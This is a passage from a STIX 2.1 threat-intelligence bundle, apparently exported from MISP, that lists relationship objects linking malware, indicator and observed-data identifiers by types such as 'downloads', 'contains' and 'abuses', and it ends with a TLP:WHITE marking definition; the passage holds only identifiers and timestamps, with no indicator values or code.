"id" : "relationship--1a6cb2e6-bfdb-4e77-b5c7-a6ead29e34a8" ,
"created" : "2019-06-01T08:22:04.000Z" ,
"modified" : "2019-06-01T08:22:04.000Z" ,
"relationship_type" : "connects-to" ,
"source_ref" : "indicator--bd7566b3-8da1-4830-9ee4-2d705598919f" ,
"target_ref" : "indicator--5cf22fbc-cecc-465b-a261-4385950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
"id" : "relationship--40b561d5-1976-4f05-9e7a-499673ffd659" ,
"created" : "2019-06-01T08:24:11.000Z" ,
"modified" : "2019-06-01T08:24:11.000Z" ,
"relationship_type" : "executes" ,
"source_ref" : "indicator--bd7566b3-8da1-4830-9ee4-2d705598919f" ,
"target_ref" : "x-misp-object--5cf235f9-14d0-4bcf-9d72-4b5f950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
"id" : "relationship--738f0138-0374-45b7-8664-00085370a299" ,
"created" : "2019-06-01T08:28:37.000Z" ,
"modified" : "2019-06-01T08:28:37.000Z" ,
"relationship_type" : "downloads" ,
"source_ref" : "malware--5cf236e8-c18c-45ff-852e-4be0950d210f" ,
"target_ref" : "indicator--5cf23717-673c-48de-9834-476d950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
"id" : "relationship--6496c0e0-204b-4b7a-83c0-37b8e4d766fa" ,
"created" : "2019-06-01T08:31:20.000Z" ,
"modified" : "2019-06-01T08:31:20.000Z" ,
"relationship_type" : "contains" ,
"source_ref" : "malware--5cf236e8-c18c-45ff-852e-4be0950d210f" ,
"target_ref" : "indicator--5cf237b6-06bc-4e57-ad7e-31bb950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
"id" : "relationship--5e50743c-8193-4cbb-a7e5-84019278877f" ,
"created" : "2019-06-01T08:39:09.000Z" ,
"modified" : "2019-06-01T08:39:09.000Z" ,
"relationship_type" : "contains" ,
"source_ref" : "malware--5cf236e8-c18c-45ff-852e-4be0950d210f" ,
"target_ref" : "indicator--5cf2397c-b0a0-475d-b764-4c2a950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
"id" : "relationship--51506d5e-74d1-4cc9-88a3-aaebf0ba002f" ,
"created" : "2019-06-01T08:42:17.000Z" ,
"modified" : "2019-06-01T08:42:17.000Z" ,
"relationship_type" : "abuses" ,
"source_ref" : "malware--5cf236e8-c18c-45ff-852e-4be0950d210f" ,
"target_ref" : "indicator--5cf23a31-1db8-4b41-81af-4416950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
"id" : "relationship--b7090b3e-332a-4674-9057-ed0e4c8f85fd" ,
"created" : "2019-06-01T08:35:54.000Z" ,
"modified" : "2019-06-01T08:35:54.000Z" ,
"relationship_type" : "contains" ,
"source_ref" : "malware--5cf23812-2ae8-4feb-8e8b-4a1f950d210f" ,
"target_ref" : "indicator--5cf238a2-0e5c-447e-a584-4072950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
"id" : "relationship--bab30b8c-f1b5-4fff-b7f5-36a20a0bd247" ,
"created" : "2019-06-01T09:03:10.000Z" ,
"modified" : "2019-06-01T09:03:10.000Z" ,
"relationship_type" : "related-to" ,
"source_ref" : "indicator--5cf23ef7-5138-4a1f-b773-4766950d210f" ,
"target_ref" : "indicator--5cf22fbc-cecc-465b-a261-4385950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
"id" : "relationship--77c6b2dd-eed7-4784-8e1f-22ee4a978e57" ,
"created" : "2019-06-01T09:09:51.000Z" ,
"modified" : "2019-06-01T09:09:51.000Z" ,
"relationship_type" : "downloaded-from" ,
"source_ref" : "indicator--5cf24083-6de0-42e3-9ae7-4129950d210f" ,
"target_ref" : "indicator--5cf240b4-352c-40a3-8aba-40b5950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
"id" : "relationship--81b16a52-9808-4b78-abbb-6255ed8ad8ee" ,
"created" : "2019-06-01T09:18:00.000Z" ,
"modified" : "2019-06-01T09:18:00.000Z" ,
"relationship_type" : "abuses" ,
"source_ref" : "x-misp-object--5cf241f4-75b0-43e7-80fe-4487950d210f" ,
"target_ref" : "observed-data--5cf2421b-bba0-4844-8d28-43c9950d210f"
} ,
{
"type" : "marking-definition" ,
"spec_version" : "2.1" ,
"id" : "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ,
"created" : "2017-01-20T00:00:00.000Z" ,
"definition_type" : "tlp" ,
"name" : "TLP:WHITE" ,
"definition" : {
"tlp" : "white"
}
}
]
}